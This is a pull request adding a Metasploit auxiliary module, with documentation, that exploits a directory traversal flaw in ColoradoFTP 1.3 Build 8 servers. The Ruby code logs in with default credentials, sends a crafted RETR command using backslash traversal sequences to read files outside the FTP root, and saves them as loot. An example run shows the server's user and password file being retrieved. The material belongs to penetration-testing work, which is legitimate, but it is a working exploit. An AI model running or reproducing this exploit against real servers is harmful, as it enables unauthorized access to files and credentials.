### PR TITLE
colorado ftp dir traversal

### DIFF
--- a/documentation/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.md
+++ b/documentation/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.md
@@ -1,0 +1,61 @@
+## Notes
+
+While the application is based in java, I was only able to get it to exploit against Windows based targets.
+
+## Vulnerable Application
+
+  [official site](http://cftp.coldcore.com/files/coloradoftp-prime-8.zip?site=cft1&rv=19.1&nc=1) or [github backup](https://github.com/h00die/MSF-Testing-Scripts/raw/master/coloradoftp-prime-8.zip)
+  
+When installing, you must edit conf/beans.xml line 182 "localIp" to put in your IP or else `pasv` won't work.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use auxiliary/scanner/ftp/colorado_ftp_traversal`
+  4. Do: `set rhosts <ip>`
+  5. Do: `run`
+  6. You should get the xml-users.xml file
+
+## Options
+
+  **FTPUSER**
+
+  Default user for Colorado FTP is `ftpuser`
+
+  **FTPPASS**
+
+  Default password for Colorado FTP is `ftpuser123`
+
+  **DEPTH**
+
+  Default depth of ../ to do is 2 to get back to the root of Colorado FTP.  This can run anywhere, so you may have to play a bit to find the root.
+
+## Scenarios
+
+  A run to obtain the user file (default in this case)
+
+    msf > use auxiliary/scanner/ftp/colorado_ftp_traversal
+    msf auxiliary(colorado_ftp_traversal) > set rhosts 1.1.1.1
+    rhosts => 1.1.1.1
+    msf auxiliary(colorado_ftp_traversal) > set verbose true
+    verbose => true
+    msf auxiliary(colorado_ftp_traversal) > exploit
+    
+    [*] 1.1.1.1:21      - Connecting to FTP server 1.1.1.1:21...
+    [*] 1.1.1.1:21      - Connected to target FTP server.
+    [*] 1.1.1.1:21      - Authenticating as ftpuser with password ftpuser123...
+    [*] 1.1.1.1:21      - Sending password...
+    [*] 1.1.1.1:21      - \\\..\..\conf\xml-users.xml
+    [*] 1.1.1.1:21      - 150 Opening A mode data connection for \\\..\..\conf\xml-users.xml.
+    
+    [*] 1.1.1.1:21      - Data returned:
+    
+    <users>
+    
+      <user name="ftpuser" pass="ftpuser123"/>
+    
+    </users>
+    [+] 1.1.1.1:21      - Stored conf\xml-users.xml to /root/.msf4/loot/20160918184409_default_1.1.1.1_coloradoftp.ftp._168381.xml
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed

--- a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability found in ColoradoFTP server
+        version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files
+        from the server GET/PUT command including file system traversal strings starting with '\\\'.
+        The server is writen in Java and therefore platform independant, however this vulnerability is only
+        exploitable on the Windows version.
+      },
+      'Platform'       => 'win',
+      'Author'         =>
+        [
+          'h00die <mike@shorebreaksecurity.com>',
+          'RvLaboratory', #discovery
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '40231'],
+          [ 'URL', 'https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86']
+        ],
+      'DisclosureDate' => 'Aug 11 2016'
+    ))
+
+    register_options(
+      [
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 2 ]),
+        OptString.new('PATH', [ true, 'Path to the file to disclose, releative to the root dir.', 'conf\\xml-users.xml']),
+        OptString.new('FTPUSER', [ true, 'Username to use for login', 'ftpuser']), #override default
+        OptString.new('FTPPASS', [ true, 'Password to use for login', 'ftpuser123']) #override default
+      ], self.class)
+
+  end
+
+  def check_host(ip)
+    begin
+      connect
+      if /Welcome to ColoradoFTP - the open source FTP server \(www\.coldcore\.com\)/i === banner
+        return Exploit::CheckCode::Appears
+      end
+    ensure
+      disconnect
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def run_host(ip)
+    begin
+      connect_login
+      sock = data_connect
+
+      file_path = datastore['PATH']
+      file = ::File.basename(file_path)
+
+      # make RETR request and store server response message...
+      retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
+      res = send_cmd( ["retr", retr_cmd], true)
+      print_status(res)
+      # read the file data from the socket that we opened
+      response_data = sock.read(1024)
+
+      unless response_data
+        print_error("#{file} not found")
+        return
+      end
+
+      if response_data.length == 0
+        print_status("File (#{file_path})from #{peer} is empty...")
+        return
+      end
+
+      # store file data to loot
+      loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
+      vprint_status("Data returned:\n")
+      vprint_line(response_data)
+      print_good("Stored #{file_path} to #{loot_file}")
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+      vprint_error(e.message)
+      elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
+    rescue ::Timeout::Error, ::Errno::EPIPE => e
+      vprint_error(e.message)
+      elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
+    ensure
+      data_disconnect
+      disconnect
+    end
+  end
+end


### PR DESCRIPTION
Add aux module to exploit WINDOWS based (java) Colorado FTP server directory traversal

This script more or less mirrors all the other aux ftp dir traversal ones.
## Verification
- [x] Start `msfconsole`
- [x] Do: `use auxiliary/scanner/ftp/colorado_ftp_traversal`
- [x] Do: `set rhosts <ip>`
- [x] Do: `run`
- [x] You should get the xml-users.xml file
